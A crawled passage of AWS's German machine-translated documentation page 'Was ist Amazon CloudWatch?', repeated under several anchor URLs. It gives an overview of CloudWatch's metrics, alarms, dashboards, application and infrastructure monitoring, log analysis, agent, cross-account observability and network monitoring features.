Webseite für Informationen über Amazon CloudWatch. Kontakt Eine zentrale Anlaufstelle für Anfragen zu AWS Abrechnung, Konto, Veranstaltungen, Missbrauch usw. JavaScript ist in Ihrem Browser nicht verfügbar oder deaktiviert. Zur Nutzung der AWS-Dokumentation muss JavaScript aktiviert sein. Weitere Informationen finden auf den Hilfe-Seiten Ihres Browsers. Dokumentkonventionen Einrichten Hat Ihnen diese Seite geholfen? – Ja Vielen Dank, dass Sie uns mitgeteilt haben, dass wir gute Arbeit geleistet haben! Würden Sie sich einen Moment Zeit nehmen, um uns mitzuteilen, was wir richtig gemacht haben, damit wir noch besser werden? Hat Ihnen diese Seite geholfen? – Nein Vielen Dank, dass Sie uns mitgeteilt haben, dass diese Seite überarbeitet werden muss. Es tut uns Leid, dass wir Ihnen nicht weiterhelfen konnten. Würden Sie sich einen Moment Zeit nehmen, um uns mitzuteilen, wie wir die Dokumentation verbessern können? | 2026-01-13T09:29:26 |
https://docs.aws.amazon.com/de_de/AmazonCloudWatch/latest/monitoring/WhatIsCloudWatch.html#cloudwatch-infrastructure-monitoring-overview | Was ist Amazon CloudWatch? - Amazon CloudWatch Was ist Amazon CloudWatch? - Amazon CloudWatch Dokumentation Amazon CloudWatch Benutzer-Leitfaden Betriebliche Transparenz mit Metriken, Alarmen und Dashboards Application Performance Monitoring (APM) Überwachung der Infrastruktur Protokolle sammeln, speichern und abfragen Verwenden Sie den CloudWatch Agenten, um Metriken, Protokolle und Traces von EC2 Amazon-Flotten zu sammeln Kontoübergreifende Überwachung Lösungskatalog CloudWatch Netzwerk-Überwachung Fakturierung und Kosten Ressourcen Die vorliegende Übersetzung wurde maschinell erstellt. Im Falle eines Konflikts oder eines Widerspruchs zwischen dieser übersetzten Fassung und der englischen Fassung (einschließlich infolge von Verzögerungen bei der Übersetzung) ist die englische Fassung maßgeblich. Was ist Amazon CloudWatch? Amazon CloudWatch überwacht Ihre Amazon Web Services (AWS) -Ressourcen und die Anwendungen, auf denen Sie laufen, AWS in Echtzeit und bietet zahlreiche Tools, mit denen Sie die Leistung, den Betriebszustand und die Ressourcennutzung Ihrer Anwendungen systemweit beobachten können. Themen Betriebliche Transparenz mit Metriken, Alarmen und Dashboards Application Performance Monitoring (APM) Überwachung der Infrastruktur Protokolle sammeln, speichern und abfragen Verwenden Sie den CloudWatch Agenten, um Metriken, Protokolle und Traces von EC2 Amazon-Flotten zu sammeln Kontoübergreifende Überwachung Lösungskatalog Netzwerk- und Internetüberwachung Fakturierung und Kosten CloudWatch Amazon-Ressourcen Betriebliche Transparenz mit Metriken, Alarmen und Dashboards Metriken erfassen und verfolgen wichtige Leistungsdaten in benutzerdefinierten Intervallen. Viele AWS Dienste melden Metriken automatisch an CloudWatch, und Sie können auch benutzerdefinierte Messwerte in CloudWatch Ihren Anwendungen veröffentlichen . Dashboards bieten eine einheitliche Ansicht Ihrer Ressourcen und Anwendungen mit Visualisierungen Ihrer Metriken und Protokolle an einem einzigen Ort. Sie können Dashboards auch konten- und regionsübergreifend teilen , um den Überblick über Ihre Abläufe zu verbessern. CloudWatch bietet kuratierte automatische Dashboards für viele AWS Dienste, sodass Sie sie nicht selbst erstellen müssen. Sie können Alarme einrichten, die Messwerte kontinuierlich anhand benutzerdefinierter CloudWatch Schwellenwerte überwachen. Sie können Sie automatisch vor Überschreitungen der Schwellenwerte warnen und auch automatisch auf Änderungen im Verhalten Ihrer Ressourcen reagieren, indem sie automatisierte Aktionen auslösen . Application Performance Monitoring (APM) Mit Application Signals können Sie die wichtigsten Leistungsindikatoren Ihrer Anwendungen wie Latenz, Fehlerraten und Anforderungsraten automatisch erkennen und überwachen, ohne dass manuelle Instrumentierung oder Codeänderungen erforderlich sind. Application Signals bietet auch kuratierte Dashboards, sodass Sie mit einem Minimum an Einrichtung mit der Überwachung beginnen können. CloudWatch Synthetics ergänzt dies, indem es Ihnen ermöglicht, Ihre Endgeräte proaktiv zu überwachen und APIs konfigurierbare Skripts, sogenannte Canaries , zu verwenden, die das Benutzerverhalten simulieren und Sie auf Verfügbarkeitsprobleme oder Leistungseinbußen aufmerksam machen, bevor sie sich auf echte Benutzer auswirken. Sie können CloudWatch RUM auch verwenden, um Leistungsdaten aus echten Benutzersitzungen zu sammeln. Verwenden Sie Service Level Objectives (SLOs) , CloudWatch um spezifische Zuverlässigkeitsziele für Ihre Anwendungen zu definieren, nachzuverfolgen und entsprechende Warnmeldungen zu erstellen. So können Sie Ihre Verpflichtungen zur Servicequalität einhalten, indem Sie Fehlerbudgets festlegen und die SLO-Einhaltung im Laufe der Zeit überwachen. Überwachung der Infrastruktur Viele AWS Dienste senden grundlegende Kennzahlen automatisch und CloudWatch kostenlos an. Services, die Metriken senden, sind hier aufgelistet . Darüber hinaus CloudWatch bietet es zusätzliche Überwachungsfunktionen für mehrere wichtige Teile der AWS Infrastruktur: Mit Database Insights können Sie die Leistungsmetriken von Datenbanken in Echtzeit überwachen, die Leistung von SQL-Abfragen analysieren und Probleme beim Laden von Datenbanken für AWS -Datenbankservices beheben. Lambda Insights bietet Metriken auf Systemebene für Lambda-Funktionen, darunter die Überwachung der Speicher- und CPU-Auslastung sowie die Erkennung und Analyse von Kaltstarts. Mit Container Insights können Sie Metriken aus containerisierten Anwendungen auf Amazon ECS-Clustern, Amazon EKS-Clustern und selbstverwalteten Kubernetes-Clustern auf Amazon sammeln und analysieren. EC2 Protokolle sammeln, speichern und abfragen CloudWatch Logs bietet eine Reihe leistungsstarker Funktionen für eine umfassende Protokollverwaltung und -analyse. Von AWS Diensten und benutzerdefinierten Anwendungen aufgenommene Protokolle werden zur einfachen Organisation in Protokollgruppen und Streams gespeichert. Verwenden Sie CloudWatch Logs Insights , um interaktive, schnelle Abfragen Ihrer Protokolldaten durchzuführen. Sie haben die Wahl zwischen drei Abfragesprachen, darunter SQL und PPL. Verwenden Sie die Erkennung von Protokollausreißern , um ungewöhnliche Muster in Protokollereignissen in einer Protokollgruppe zu finden, die auf Probleme hinweisen können. Erstellen Sie Metrikfilter , um numerische Werte aus Protokollen zu extrahieren und CloudWatch Metriken zu generieren, die Sie für Benachrichtigungen und Dashboards verwenden können. Richten Sie Abonnementfilter ein, um Protokolle in Echtzeit zu verarbeiten und zu analysieren oder sie an andere Services wie Amazon S3 oder Firehose weiterzuleiten. Verwenden Sie den CloudWatch Agenten, um Metriken, Protokolle und Traces von EC2 Amazon-Flotten zu sammeln Verwenden Sie den CloudWatch Agenten , um detaillierte Systemmetriken zu Prozessen, CPU, Arbeitsspeicher, Festplattennutzung und Netzwerkleistung von Ihren Flotten von EC2 Amazon-Instances und lokalen Servern zu sammeln. Sie können auch benutzerdefinierte Metriken aus Ihren Anwendungen sammeln und überwachen, Protokolle aus mehreren Quellen zusammenfassen und Alarme auf der Grundlage der gesammelten Daten konfigurieren. Sie können den Agenten auch verwenden, um GPU-Metriken zu sammeln. Der Agent unterstützt sowohl Windows- als auch Linux-Betriebssysteme und kann zur zentralen Konfigurationsverwaltung in Systems Manager integriert werden. Kontoübergreifende Überwachung CloudWatch Mit der kontenübergreifenden Observability können Sie ein zentrales Überwachungskonto einrichten, um Anwendungen zu überwachen und Fehler zu beheben, die sich über mehrere Konten erstrecken. Über das zentrale Konto können Sie Metriken, Protokolle und Ablaufverfolgungen von Quellkonten in Ihrer gesamten Organisation einsehen. Dieser zentralisierte Ansatz ermöglicht es Ihnen, kontenübergreifende Dashboards zu erstellen, Alarme einzurichten, die Metriken mehrerer Konten zu überwachen, und Ursachenanalysen über Kontogrenzen hinweg durchzuführen. Mit der CloudWatch kontenübergreifenden Observability können Sie Quellkonten entweder einzeln oder automatisch miteinander verknüpfen. AWS Organizations Lösungskatalog CloudWatch bietet einen Katalog leicht verfügbarer Konfigurationen, mit denen Sie schnell die Überwachung verschiedener AWS Dienste und gängiger Workloads wie Java Virtual Machines (JVM), NVIDIA GPU, Apache Kafka, Apache Tomcat und NGINX implementieren können. Diese Lösungen bieten gezielte Anleitungen, einschließlich Anweisungen zur Installation und Konfiguration des CloudWatch Agenten, zur Bereitstellung vordefinierter benutzerdefinierter Dashboards und zur Einrichtung entsprechender Alarme. Netzwerk- und Internetüberwachung CloudWatch bietet umfassende Netzwerk- und Internetüberwachungsfunktionen über CloudWatch Network Monitoring. Internet Monitor verwendet AWS globale Netzwerkdaten, um die Internetleistung und Verfügbarkeit zwischen Ihren Anwendungen und Endbenutzern zu analysieren. Mit einem Internetmonitor können Sie erhöhte Latenzzeiten oder regionale Störungen, die sich auf Ihre Kunden auswirken, erkennen oder Benachrichtigungen erhalten. Internetmonitore analysieren Ihre VPC-Flussprotokolle, um automatisierte Einblicke in die Muster und die Leistung des Netzwerkverkehrs zu erhalten. Sie können ebenfalls Vorschläge dazu erhalten, wie Sie die Anwendungsleistung für Ihre Clients optimieren können. Network Flow Monitor zeigt Informationen zur Netzwerkleistung an, die von einfachen Softwareagenten gesammelt wurden, die Sie auf Ihren Instances installieren. Mithilfe eines Flow Monitors können Sie schnell den Paketverlust und die Latenz Ihrer Netzwerkverbindungen über einen von Ihnen festgelegten Zeitraum visualisieren. Jeder Monitor generiert außerdem einen Netzwerkstatusindikator (Network Health Indicator, NHI), der Ihnen mitteilt, ob während des von Ihnen untersuchten Zeitraums AWS Netzwerkprobleme bei den Netzwerkströmen aufgetreten sind, die von Ihrem Monitor aufgezeichnet wurden. Wenn Sie eine Verbindung herstellen Direct Connect, können Sie synthetische Monitore in Network Synthetic Monitor verwenden, um die Netzwerkkonnektivität proaktiv zu überwachen, indem Sie synthetische Tests zwischen einer VPC und lokalen Endpunkten ausführen. Wenn Sie einen synthetischen Monitor erstellen, geben Sie Tests an, indem Sie ein VPC-Subnetz und lokale IP-Adressen angeben. AWS erstellt und verwaltet die Infrastruktur im Hintergrund, die für die Durchführung von Messungen der Umlaufzeit und des Paketverlusts mit den Sonden erforderlich ist. Diese Tests erkennen Probleme mit Konnektivität, DNS und Latenz, bevor sie sich auf Ihre Anwendungen auswirken, sodass Sie Maßnahmen ergreifen können, um die Erfahrung Ihrer Endbenutzer zu verbessern. Fakturierung und Kosten Vollständige Informationen zu den CloudWatch Preisen finden Sie unter CloudWatch Amazon-Preise . Informationen, die Ihnen helfen können, Ihre Rechnung zu analysieren und möglicherweise Kosten zu optimieren und zu senken, finden Sie unter CloudWatch Kosten analysieren, optimieren und reduzieren . CloudWatch Amazon-Ressourcen Die folgenden verwandten Ressourcen bieten Ihnen nützliche Informationen für die Arbeit mit diesem Service. Ressource Description Amazon CloudWatch FAQs Die Webseite „Häufig gestellte Fragen” deckt alle wichtigsten Fragen ab, die Entwickler zu diesem Produkt gestellt haben. AWS Entwicklerzentrum Ein zentraler Ausgangspunkt, um Dokumentation, Codebeispiele, Versionshinweise und andere Informationen zu finden, mit denen Sie innovative Anwendungen entwickeln können AWS. AWS-Managementkonsole Mit der Konsole können Sie die meisten Funktionen von Amazon CloudWatch und verschiedenen anderen AWS Angeboten ohne Programmierung ausführen. CloudWatch Amazon-Diskussionsforen Community-basiertes Forum für Entwickler zur Diskussion technischer Fragen zu Amazon. CloudWatch AWS Support Die zentrale Anlaufstelle für die Erstellung und Verwaltung Ihrer AWS Support Fälle. Enthält auch Links zu anderen hilfreichen Ressourcen wie Foren, technischen InformationenFAQs, Servicestatus und AWS Trusted Advisor. CloudWatch Amazon-Produktinformationen Die primäre Webseite für Informationen über Amazon CloudWatch. Kontakt Eine zentrale Anlaufstelle für Anfragen zu AWS Abrechnung, Konto, Veranstaltungen, Missbrauch usw. JavaScript ist in Ihrem Browser nicht verfügbar oder deaktiviert. Zur Nutzung der AWS-Dokumentation muss JavaScript aktiviert sein. Weitere Informationen finden auf den Hilfe-Seiten Ihres Browsers. Dokumentkonventionen Einrichten Hat Ihnen diese Seite geholfen? – Ja Vielen Dank, dass Sie uns mitgeteilt haben, dass wir gute Arbeit geleistet haben! Würden Sie sich einen Moment Zeit nehmen, um uns mitzuteilen, was wir richtig gemacht haben, damit wir noch besser werden? Hat Ihnen diese Seite geholfen? – Nein Vielen Dank, dass Sie uns mitgeteilt haben, dass diese Seite überarbeitet werden muss. Es tut uns Leid, dass wir Ihnen nicht weiterhelfen konnten. Würden Sie sich einen Moment Zeit nehmen, um uns mitzuteilen, wie wir die Dokumentation verbessern können? | 2026-01-13T09:29:26 |
https://docs.aws.amazon.com/de_de/AmazonCloudWatch/latest/monitoring/WhatIsCloudWatch.html#cloudwatch-agent-overview | Was ist Amazon CloudWatch? - Amazon CloudWatch Was ist Amazon CloudWatch? - Amazon CloudWatch Dokumentation Amazon CloudWatch Benutzer-Leitfaden Betriebliche Transparenz mit Metriken, Alarmen und Dashboards Application Performance Monitoring (APM) Überwachung der Infrastruktur Protokolle sammeln, speichern und abfragen Verwenden Sie den CloudWatch Agenten, um Metriken, Protokolle und Traces von EC2 Amazon-Flotten zu sammeln Kontoübergreifende Überwachung Lösungskatalog CloudWatch Netzwerk-Überwachung Fakturierung und Kosten Ressourcen Die vorliegende Übersetzung wurde maschinell erstellt. Im Falle eines Konflikts oder eines Widerspruchs zwischen dieser übersetzten Fassung und der englischen Fassung (einschließlich infolge von Verzögerungen bei der Übersetzung) ist die englische Fassung maßgeblich. Was ist Amazon CloudWatch? Amazon CloudWatch überwacht Ihre Amazon Web Services (AWS) -Ressourcen und die Anwendungen, auf denen Sie laufen, AWS in Echtzeit und bietet zahlreiche Tools, mit denen Sie die Leistung, den Betriebszustand und die Ressourcennutzung Ihrer Anwendungen systemweit beobachten können. Themen Betriebliche Transparenz mit Metriken, Alarmen und Dashboards Application Performance Monitoring (APM) Überwachung der Infrastruktur Protokolle sammeln, speichern und abfragen Verwenden Sie den CloudWatch Agenten, um Metriken, Protokolle und Traces von EC2 Amazon-Flotten zu sammeln Kontoübergreifende Überwachung Lösungskatalog Netzwerk- und Internetüberwachung Fakturierung und Kosten CloudWatch Amazon-Ressourcen Betriebliche Transparenz mit Metriken, Alarmen und Dashboards Metriken erfassen und verfolgen wichtige Leistungsdaten in benutzerdefinierten Intervallen. Viele AWS Dienste melden Metriken automatisch an CloudWatch, und Sie können auch benutzerdefinierte Messwerte in CloudWatch Ihren Anwendungen veröffentlichen . Dashboards bieten eine einheitliche Ansicht Ihrer Ressourcen und Anwendungen mit Visualisierungen Ihrer Metriken und Protokolle an einem einzigen Ort. Sie können Dashboards auch konten- und regionsübergreifend teilen , um den Überblick über Ihre Abläufe zu verbessern. CloudWatch bietet kuratierte automatische Dashboards für viele AWS Dienste, sodass Sie sie nicht selbst erstellen müssen. Sie können Alarme einrichten, die Messwerte kontinuierlich anhand benutzerdefinierter CloudWatch Schwellenwerte überwachen. Sie können Sie automatisch vor Überschreitungen der Schwellenwerte warnen und auch automatisch auf Änderungen im Verhalten Ihrer Ressourcen reagieren, indem sie automatisierte Aktionen auslösen . Application Performance Monitoring (APM) Mit Application Signals können Sie die wichtigsten Leistungsindikatoren Ihrer Anwendungen wie Latenz, Fehlerraten und Anforderungsraten automatisch erkennen und überwachen, ohne dass manuelle Instrumentierung oder Codeänderungen erforderlich sind. Application Signals bietet auch kuratierte Dashboards, sodass Sie mit einem Minimum an Einrichtung mit der Überwachung beginnen können. CloudWatch Synthetics ergänzt dies, indem es Ihnen ermöglicht, Ihre Endgeräte proaktiv zu überwachen und APIs konfigurierbare Skripts, sogenannte Canaries , zu verwenden, die das Benutzerverhalten simulieren und Sie auf Verfügbarkeitsprobleme oder Leistungseinbußen aufmerksam machen, bevor sie sich auf echte Benutzer auswirken. Sie können CloudWatch RUM auch verwenden, um Leistungsdaten aus echten Benutzersitzungen zu sammeln. Verwenden Sie Service Level Objectives (SLOs) , CloudWatch um spezifische Zuverlässigkeitsziele für Ihre Anwendungen zu definieren, nachzuverfolgen und entsprechende Warnmeldungen zu erstellen. So können Sie Ihre Verpflichtungen zur Servicequalität einhalten, indem Sie Fehlerbudgets festlegen und die SLO-Einhaltung im Laufe der Zeit überwachen. Überwachung der Infrastruktur Viele AWS Dienste senden grundlegende Kennzahlen automatisch und CloudWatch kostenlos an. Services, die Metriken senden, sind hier aufgelistet . Darüber hinaus CloudWatch bietet es zusätzliche Überwachungsfunktionen für mehrere wichtige Teile der AWS Infrastruktur: Mit Database Insights können Sie die Leistungsmetriken von Datenbanken in Echtzeit überwachen, die Leistung von SQL-Abfragen analysieren und Probleme beim Laden von Datenbanken für AWS -Datenbankservices beheben. Lambda Insights bietet Metriken auf Systemebene für Lambda-Funktionen, darunter die Überwachung der Speicher- und CPU-Auslastung sowie die Erkennung und Analyse von Kaltstarts. Mit Container Insights können Sie Metriken aus containerisierten Anwendungen auf Amazon ECS-Clustern, Amazon EKS-Clustern und selbstverwalteten Kubernetes-Clustern auf Amazon sammeln und analysieren. EC2 Protokolle sammeln, speichern und abfragen CloudWatch Logs bietet eine Reihe leistungsstarker Funktionen für eine umfassende Protokollverwaltung und -analyse. Von AWS Diensten und benutzerdefinierten Anwendungen aufgenommene Protokolle werden zur einfachen Organisation in Protokollgruppen und Streams gespeichert. Verwenden Sie CloudWatch Logs Insights , um interaktive, schnelle Abfragen Ihrer Protokolldaten durchzuführen. Sie haben die Wahl zwischen drei Abfragesprachen, darunter SQL und PPL. Verwenden Sie die Erkennung von Protokollausreißern , um ungewöhnliche Muster in Protokollereignissen in einer Protokollgruppe zu finden, die auf Probleme hinweisen können. Erstellen Sie Metrikfilter , um numerische Werte aus Protokollen zu extrahieren und CloudWatch Metriken zu generieren, die Sie für Benachrichtigungen und Dashboards verwenden können. Richten Sie Abonnementfilter ein, um Protokolle in Echtzeit zu verarbeiten und zu analysieren oder sie an andere Services wie Amazon S3 oder Firehose weiterzuleiten. Verwenden Sie den CloudWatch Agenten, um Metriken, Protokolle und Traces von EC2 Amazon-Flotten zu sammeln Verwenden Sie den CloudWatch Agenten , um detaillierte Systemmetriken zu Prozessen, CPU, Arbeitsspeicher, Festplattennutzung und Netzwerkleistung von Ihren Flotten von EC2 Amazon-Instances und lokalen Servern zu sammeln. Sie können auch benutzerdefinierte Metriken aus Ihren Anwendungen sammeln und überwachen, Protokolle aus mehreren Quellen zusammenfassen und Alarme auf der Grundlage der gesammelten Daten konfigurieren. Sie können den Agenten auch verwenden, um GPU-Metriken zu sammeln. Der Agent unterstützt sowohl Windows- als auch Linux-Betriebssysteme und kann zur zentralen Konfigurationsverwaltung in Systems Manager integriert werden. Kontoübergreifende Überwachung CloudWatch Mit der kontenübergreifenden Observability können Sie ein zentrales Überwachungskonto einrichten, um Anwendungen zu überwachen und Fehler zu beheben, die sich über mehrere Konten erstrecken. Über das zentrale Konto können Sie Metriken, Protokolle und Ablaufverfolgungen von Quellkonten in Ihrer gesamten Organisation einsehen. Dieser zentralisierte Ansatz ermöglicht es Ihnen, kontenübergreifende Dashboards zu erstellen, Alarme einzurichten, die Metriken mehrerer Konten zu überwachen, und Ursachenanalysen über Kontogrenzen hinweg durchzuführen. Mit der CloudWatch kontenübergreifenden Observability können Sie Quellkonten entweder einzeln oder automatisch miteinander verknüpfen. AWS Organizations Lösungskatalog CloudWatch bietet einen Katalog leicht verfügbarer Konfigurationen, mit denen Sie schnell die Überwachung verschiedener AWS Dienste und gängiger Workloads wie Java Virtual Machines (JVM), NVIDIA GPU, Apache Kafka, Apache Tomcat und NGINX implementieren können. Diese Lösungen bieten gezielte Anleitungen, einschließlich Anweisungen zur Installation und Konfiguration des CloudWatch Agenten, zur Bereitstellung vordefinierter benutzerdefinierter Dashboards und zur Einrichtung entsprechender Alarme. Netzwerk- und Internetüberwachung CloudWatch bietet umfassende Netzwerk- und Internetüberwachungsfunktionen über CloudWatch Network Monitoring. Internet Monitor verwendet AWS globale Netzwerkdaten, um die Internetleistung und Verfügbarkeit zwischen Ihren Anwendungen und Endbenutzern zu analysieren. Mit einem Internetmonitor können Sie erhöhte Latenzzeiten oder regionale Störungen, die sich auf Ihre Kunden auswirken, erkennen oder Benachrichtigungen erhalten. Internetmonitore analysieren Ihre VPC-Flussprotokolle, um automatisierte Einblicke in die Muster und die Leistung des Netzwerkverkehrs zu erhalten. Sie können ebenfalls Vorschläge dazu erhalten, wie Sie die Anwendungsleistung für Ihre Clients optimieren können. Network Flow Monitor zeigt Informationen zur Netzwerkleistung an, die von einfachen Softwareagenten gesammelt wurden, die Sie auf Ihren Instances installieren. Mithilfe eines Flow Monitors können Sie schnell den Paketverlust und die Latenz Ihrer Netzwerkverbindungen über einen von Ihnen festgelegten Zeitraum visualisieren. Jeder Monitor generiert außerdem einen Netzwerkstatusindikator (Network Health Indicator, NHI), der Ihnen mitteilt, ob während des von Ihnen untersuchten Zeitraums AWS Netzwerkprobleme bei den Netzwerkströmen aufgetreten sind, die von Ihrem Monitor aufgezeichnet wurden. Wenn Sie eine Verbindung herstellen Direct Connect, können Sie synthetische Monitore in Network Synthetic Monitor verwenden, um die Netzwerkkonnektivität proaktiv zu überwachen, indem Sie synthetische Tests zwischen einer VPC und lokalen Endpunkten ausführen. Wenn Sie einen synthetischen Monitor erstellen, geben Sie Tests an, indem Sie ein VPC-Subnetz und lokale IP-Adressen angeben. AWS erstellt und verwaltet die Infrastruktur im Hintergrund, die für die Durchführung von Messungen der Umlaufzeit und des Paketverlusts mit den Sonden erforderlich ist. Diese Tests erkennen Probleme mit Konnektivität, DNS und Latenz, bevor sie sich auf Ihre Anwendungen auswirken, sodass Sie Maßnahmen ergreifen können, um die Erfahrung Ihrer Endbenutzer zu verbessern. Fakturierung und Kosten Vollständige Informationen zu den CloudWatch Preisen finden Sie unter CloudWatch Amazon-Preise . Informationen, die Ihnen helfen können, Ihre Rechnung zu analysieren und möglicherweise Kosten zu optimieren und zu senken, finden Sie unter CloudWatch Kosten analysieren, optimieren und reduzieren . CloudWatch Amazon-Ressourcen Die folgenden verwandten Ressourcen bieten Ihnen nützliche Informationen für die Arbeit mit diesem Service. Ressource Description Amazon CloudWatch FAQs Die Webseite „Häufig gestellte Fragen” deckt alle wichtigsten Fragen ab, die Entwickler zu diesem Produkt gestellt haben. AWS Entwicklerzentrum Ein zentraler Ausgangspunkt, um Dokumentation, Codebeispiele, Versionshinweise und andere Informationen zu finden, mit denen Sie innovative Anwendungen entwickeln können AWS. AWS-Managementkonsole Mit der Konsole können Sie die meisten Funktionen von Amazon CloudWatch und verschiedenen anderen AWS Angeboten ohne Programmierung ausführen. CloudWatch Amazon-Diskussionsforen Community-basiertes Forum für Entwickler zur Diskussion technischer Fragen zu Amazon. CloudWatch AWS Support Die zentrale Anlaufstelle für die Erstellung und Verwaltung Ihrer AWS Support Fälle. Enthält auch Links zu anderen hilfreichen Ressourcen wie Foren, technischen InformationenFAQs, Servicestatus und AWS Trusted Advisor. CloudWatch Amazon-Produktinformationen Die primäre Webseite für Informationen über Amazon CloudWatch. Kontakt Eine zentrale Anlaufstelle für Anfragen zu AWS Abrechnung, Konto, Veranstaltungen, Missbrauch usw. JavaScript ist in Ihrem Browser nicht verfügbar oder deaktiviert. Zur Nutzung der AWS-Dokumentation muss JavaScript aktiviert sein. Weitere Informationen finden auf den Hilfe-Seiten Ihres Browsers. Dokumentkonventionen Einrichten Hat Ihnen diese Seite geholfen? – Ja Vielen Dank, dass Sie uns mitgeteilt haben, dass wir gute Arbeit geleistet haben! Würden Sie sich einen Moment Zeit nehmen, um uns mitzuteilen, was wir richtig gemacht haben, damit wir noch besser werden? Hat Ihnen diese Seite geholfen? – Nein Vielen Dank, dass Sie uns mitgeteilt haben, dass diese Seite überarbeitet werden muss. Es tut uns Leid, dass wir Ihnen nicht weiterhelfen konnten. Würden Sie sich einen Moment Zeit nehmen, um uns mitzuteilen, wie wir die Dokumentation verbessern können? | 2026-01-13T09:29:26 |
https://docs.aws.amazon.com/de_de/AmazonCloudWatch/latest/monitoring/WhatIsCloudWatch.html#cloudwatch-solutions-overview | Was ist Amazon CloudWatch? - Amazon CloudWatch Was ist Amazon CloudWatch? - Amazon CloudWatch Dokumentation Amazon CloudWatch Benutzer-Leitfaden Betriebliche Transparenz mit Metriken, Alarmen und Dashboards Application Performance Monitoring (APM) Überwachung der Infrastruktur Protokolle sammeln, speichern und abfragen Verwenden Sie den CloudWatch Agenten, um Metriken, Protokolle und Traces von EC2 Amazon-Flotten zu sammeln Kontoübergreifende Überwachung Lösungskatalog CloudWatch Netzwerk-Überwachung Fakturierung und Kosten Ressourcen Die vorliegende Übersetzung wurde maschinell erstellt. Im Falle eines Konflikts oder eines Widerspruchs zwischen dieser übersetzten Fassung und der englischen Fassung (einschließlich infolge von Verzögerungen bei der Übersetzung) ist die englische Fassung maßgeblich. Was ist Amazon CloudWatch? Amazon CloudWatch überwacht Ihre Amazon Web Services (AWS) -Ressourcen und die Anwendungen, auf denen Sie laufen, AWS in Echtzeit und bietet zahlreiche Tools, mit denen Sie die Leistung, den Betriebszustand und die Ressourcennutzung Ihrer Anwendungen systemweit beobachten können. Themen Betriebliche Transparenz mit Metriken, Alarmen und Dashboards Application Performance Monitoring (APM) Überwachung der Infrastruktur Protokolle sammeln, speichern und abfragen Verwenden Sie den CloudWatch Agenten, um Metriken, Protokolle und Traces von EC2 Amazon-Flotten zu sammeln Kontoübergreifende Überwachung Lösungskatalog Netzwerk- und Internetüberwachung Fakturierung und Kosten CloudWatch Amazon-Ressourcen Betriebliche Transparenz mit Metriken, Alarmen und Dashboards Metriken erfassen und verfolgen wichtige Leistungsdaten in benutzerdefinierten Intervallen. Viele AWS Dienste melden Metriken automatisch an CloudWatch, und Sie können auch benutzerdefinierte Messwerte in CloudWatch Ihren Anwendungen veröffentlichen . Dashboards bieten eine einheitliche Ansicht Ihrer Ressourcen und Anwendungen mit Visualisierungen Ihrer Metriken und Protokolle an einem einzigen Ort. Sie können Dashboards auch konten- und regionsübergreifend teilen , um den Überblick über Ihre Abläufe zu verbessern. CloudWatch bietet kuratierte automatische Dashboards für viele AWS Dienste, sodass Sie sie nicht selbst erstellen müssen. Sie können Alarme einrichten, die Messwerte kontinuierlich anhand benutzerdefinierter CloudWatch Schwellenwerte überwachen. Sie können Sie automatisch vor Überschreitungen der Schwellenwerte warnen und auch automatisch auf Änderungen im Verhalten Ihrer Ressourcen reagieren, indem sie automatisierte Aktionen auslösen . Application Performance Monitoring (APM) Mit Application Signals können Sie die wichtigsten Leistungsindikatoren Ihrer Anwendungen wie Latenz, Fehlerraten und Anforderungsraten automatisch erkennen und überwachen, ohne dass manuelle Instrumentierung oder Codeänderungen erforderlich sind. Application Signals bietet auch kuratierte Dashboards, sodass Sie mit einem Minimum an Einrichtung mit der Überwachung beginnen können. CloudWatch Synthetics ergänzt dies, indem es Ihnen ermöglicht, Ihre Endgeräte proaktiv zu überwachen und APIs konfigurierbare Skripts, sogenannte Canaries , zu verwenden, die das Benutzerverhalten simulieren und Sie auf Verfügbarkeitsprobleme oder Leistungseinbußen aufmerksam machen, bevor sie sich auf echte Benutzer auswirken. Sie können CloudWatch RUM auch verwenden, um Leistungsdaten aus echten Benutzersitzungen zu sammeln. Verwenden Sie Service Level Objectives (SLOs) , CloudWatch um spezifische Zuverlässigkeitsziele für Ihre Anwendungen zu definieren, nachzuverfolgen und entsprechende Warnmeldungen zu erstellen. So können Sie Ihre Verpflichtungen zur Servicequalität einhalten, indem Sie Fehlerbudgets festlegen und die SLO-Einhaltung im Laufe der Zeit überwachen. Überwachung der Infrastruktur Viele AWS Dienste senden grundlegende Kennzahlen automatisch und CloudWatch kostenlos an. Services, die Metriken senden, sind hier aufgelistet . Darüber hinaus CloudWatch bietet es zusätzliche Überwachungsfunktionen für mehrere wichtige Teile der AWS Infrastruktur: Mit Database Insights können Sie die Leistungsmetriken von Datenbanken in Echtzeit überwachen, die Leistung von SQL-Abfragen analysieren und Probleme beim Laden von Datenbanken für AWS -Datenbankservices beheben. Lambda Insights bietet Metriken auf Systemebene für Lambda-Funktionen, darunter die Überwachung der Speicher- und CPU-Auslastung sowie die Erkennung und Analyse von Kaltstarts. Mit Container Insights können Sie Metriken aus containerisierten Anwendungen auf Amazon ECS-Clustern, Amazon EKS-Clustern und selbstverwalteten Kubernetes-Clustern auf Amazon sammeln und analysieren. EC2 Protokolle sammeln, speichern und abfragen CloudWatch Logs bietet eine Reihe leistungsstarker Funktionen für eine umfassende Protokollverwaltung und -analyse. Von AWS Diensten und benutzerdefinierten Anwendungen aufgenommene Protokolle werden zur einfachen Organisation in Protokollgruppen und Streams gespeichert. Verwenden Sie CloudWatch Logs Insights , um interaktive, schnelle Abfragen Ihrer Protokolldaten durchzuführen. Sie haben die Wahl zwischen drei Abfragesprachen, darunter SQL und PPL. Verwenden Sie die Erkennung von Protokollausreißern , um ungewöhnliche Muster in Protokollereignissen in einer Protokollgruppe zu finden, die auf Probleme hinweisen können. Erstellen Sie Metrikfilter , um numerische Werte aus Protokollen zu extrahieren und CloudWatch Metriken zu generieren, die Sie für Benachrichtigungen und Dashboards verwenden können. Richten Sie Abonnementfilter ein, um Protokolle in Echtzeit zu verarbeiten und zu analysieren oder sie an andere Services wie Amazon S3 oder Firehose weiterzuleiten. Verwenden Sie den CloudWatch Agenten, um Metriken, Protokolle und Traces von EC2 Amazon-Flotten zu sammeln Verwenden Sie den CloudWatch Agenten , um detaillierte Systemmetriken zu Prozessen, CPU, Arbeitsspeicher, Festplattennutzung und Netzwerkleistung von Ihren Flotten von EC2 Amazon-Instances und lokalen Servern zu sammeln. Sie können auch benutzerdefinierte Metriken aus Ihren Anwendungen sammeln und überwachen, Protokolle aus mehreren Quellen zusammenfassen und Alarme auf der Grundlage der gesammelten Daten konfigurieren. Sie können den Agenten auch verwenden, um GPU-Metriken zu sammeln. Der Agent unterstützt sowohl Windows- als auch Linux-Betriebssysteme und kann zur zentralen Konfigurationsverwaltung in Systems Manager integriert werden. Kontoübergreifende Überwachung CloudWatch Mit 